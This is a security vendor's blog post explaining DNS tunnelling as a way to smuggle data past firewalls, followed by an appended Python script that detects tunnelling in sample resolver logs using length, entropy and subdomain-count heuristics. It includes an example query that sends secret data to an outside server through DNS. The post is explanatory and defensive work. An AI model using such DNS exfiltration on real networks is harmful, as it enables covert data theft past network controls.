DNS Tunnelling

Author: Colin Robbins


A recent project at Nexor required us to look at the challenges of providing access to the DNS from a secure environment. It reminded me of the issues related to DNS tunnelling.

DNS tunnelling enables a user to run a full TCP/IP stack over the top of the DNS protocol. This is especially useful when a firewall is blocking outbound ports. DNS tunnelling is not new, and it is surprisingly simple to do. For example, the following DNS query:

secret_data_sent_via_dns.infoleak.nexor.com

will pass the message 'secret_data_sent_via_dns' to the server for infoleak.nexor.com (data leaving the network). The server might respond:

Response.infoleak.nexor.com. 0 IN TXT 'Message received – thanks'

Thus two-way data communication has occurred. Once you have two-way communication, you can run any communication protocol of your choice, including TCP/IP. Sadly, DNS tunnelling means a firewall is now pretty much useless as a tool to control the network traffic that leaves a business. As an attacker, once you have managed to get software to execute on the inside of a firewall, you can use the DNS to set up a communication tunnel to get data out (or more malware in). Is this a problem that concerns your business? If so, contact Nexor to find out how we can help solve the problem.
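The query and response above show why the encoded payload has to travel in the query name itself, which is also what makes tunnelling visible in resolver logs. The following is an added example (not part of the original post or of any Nexor tool) that runs three simple heuristics over a constructed sample of query logs: an unusually long label, a high-entropy label, and many distinct subdomains under one registered domain. The log format, the thresholds and the names under example.net are assumptions made for the example.

```python
import math
from collections import defaultdict

# Constructed sample of resolver query logs ("<client> <qname> <qtype>"); the
# names under example.net stand in for an encoding tunnel and are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 www.nexor.com A
10.0.0.5 secret_data_sent_via_dns.infoleak.nexor.com A
10.0.0.7 mail.google.com MX
10.0.0.5 q2w3e4r5t6y7uiopasdfghjklzxcvbnm.t.example.net TXT
10.0.0.5 zxcvbnmasdfghjklqwertyuiop234567.t.example.net TXT
10.0.0.5 nvqwy53bojsss.t.example.net TXT
10.0.0.9 cdn.example.org A
"""

def shannon_entropy(s):
    """Bits per character; encoded payloads score higher than ordinary words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))

def split_name(qname, depth=2):
    """Return (subdomain labels, registered domain) for a query name."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-depth], ".".join(labels[-depth:])

def analyse_queries(log, max_label=20, min_entropy=3.5, max_unique=2):
    """Map each suspicious qname to the list of heuristics it tripped."""
    entries = []
    unique_subs = defaultdict(set)
    for line in log.strip().splitlines():
        _client, qname, _qtype = line.split()
        subs, domain = split_name(qname)
        entries.append((qname, subs, domain))
        unique_subs[domain].add(".".join(subs))
    flagged = {}
    for qname, subs, domain in entries:
        reasons = []
        longest = max(subs, key=len, default="")
        if len(longest) > max_label:
            reasons.append("long label")
        if shannon_entropy(longest) >= min_entropy:
            reasons.append("high entropy")
        if len(unique_subs[domain]) > max_unique:  # volume of distinct names
            reasons.append("many unique subdomains")
        if reasons:
            flagged[qname] = reasons
    return flagged

if __name__ == "__main__":
    for name, why in analyse_queries(SAMPLE_LOG).items():
        print(f"{name}: {', '.join(why)}")
```

Note that the human-readable query from the post trips only the label-length check, since plain words have low entropy; this is why a volume check across distinct subdomains per domain is worth keeping alongside the per-name heuristics.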


About the author

Colin Robbins is a Principal Security Consultant, leading customer-funded research activities in secure interoperability and information exchange. He has specific technical interests in the Single Information Environment and Data Centric Security, as well as the processes of security, such as Secure by Design and Information Security Management Systems (ISMS). He is a Fellow of CIISec, and a former NCSC certified Security and Information Risk Adviser (Lead CCP).
